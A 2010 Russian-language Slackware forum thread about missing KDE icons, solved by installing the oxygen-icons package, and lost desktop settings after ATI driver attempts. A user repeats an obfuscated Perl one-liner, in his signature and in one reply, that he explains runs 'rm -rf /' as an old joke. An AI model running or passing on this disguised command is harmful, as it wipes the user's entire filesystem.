Ivanovo Linux Users Group - Not logged in
Forum Help Search Login
Previous Next Up Topic Дистрибутивы / Slackware / Пропали все значки (13877 hits)
- By MaxyS Date 01.02.10 22:19
Вобщем после очередного обновления кде пропала половина значков приложений, устройств, типов файлов и т.п. Установка новой темы иконок не помогла, дефолтовую кристал не видит вообще.
Вопрос знатокам)))
Parent By hawk Date 02.02.10 06:06
На счет КДЕ не скажу, не пользуюсь, но вот в целом сталкивался с багом МИМЕ типов файлов. Проявляется так же, тема есть всё в норме, но соответствия поломаны.
echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Parent - By @LOE (Site/forum admin) Date 02.02.10 08:51
С какой на какую версию KDE обновлялся? Про зависимости не забыл?
На каком-то этапе обновлений тоже такое случилось. Что сделал: удалил пакеты и заново поставил (не апгрейдил, и именно удалил-поставил).
Как крайняя мера: переименовать .kde каталог в home.
"No! Try not! Do. Or do not. There is no try." -- Yoda
Parent - By MaxyS Date 03.02.10 04:54
slapt-get --upgrade
Обновлял в 13.0 до currrent? То есть c 4.2.4 до 4.3.4.
.kde вообще удалял не помогло.
slapt-get по моему так и делает, удаляет пакет перед установкой нового.
Parent - By MaxyS Date 03.02.10 05:11
Разобрался, посмотрел полный список доступных пакетов kde и нашел такую запись:
oxygen-icons-4.3.4-i486-1 [inst=нет]: oxygen-icons (Oxygen theme for the KDE Plasma Desktop)
Установил пакет, все стало нормально))
Parent By @LOE (Site/forum admin) Date 03.02.10 07:52
Ну так про зависимости надо всегда в первую очередь думать ;-)
"No! Try not! Do. Or do not. There is no try." -- Yoda
Parent - By MaxyS Date 14.07.10 07:25
Плодить однотипные темы не буду, напишу тут)
После безуспешных попыток установки драйвера ати пропали все настройки рабочего стола в кде. Все эффекты 3д работают, но на вкладке главное не могу отключить ничего, все неактивно, на вкладке эффекты пусто, нет никаких расширений и соответственно их настроек. Что делал точно не помню, но пробовал установить на ноут дрова ати.
Parent - By @LOE (Site/forum admin) Date 15.07.10 10:49
Попробуй переименовать каталог ~/.kde (или авторизоваться другим пользователем).
Переустанови KDE-пакеты.
Ну и снеси что там наустанавливал ;-)
"No! Try not! Do. Or do not. There is no try." -- Yoda
Parent - By hawk Date 15.07.10 12:59

>> Переустанови KDE-пакеты.


Кардинально... Гдавное чтобы не
echo "KDE обновись ..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

MaxyS не вздумай выполнять, это я так шучу (старая шутка)
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

=
rm -rf /

ох уж этот чудо ПЕРЛ
echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Parent - By @LOE (Site/forum admin) Date 15.07.10 13:46
Что кардинального?!
Перестановка _пакетов_ КДЕ, а не системы с нуля.
Вот удаление/переименование .kde - это более кардинальный тест.
"No! Try not! Do. Or do not. There is no try." -- Yoda
Parent By MaxyS Date 19.07.10 10:43
Спасибо, переставил кде все теперь появилось)
Previous Next Up Topic Дистрибутивы / Slackware / Пропали все значки (13877 hits)

Powered by mwForum 2.12.0 © 1999-2007 Markus Wichitill

Page created in 0.074s with 10 database queries.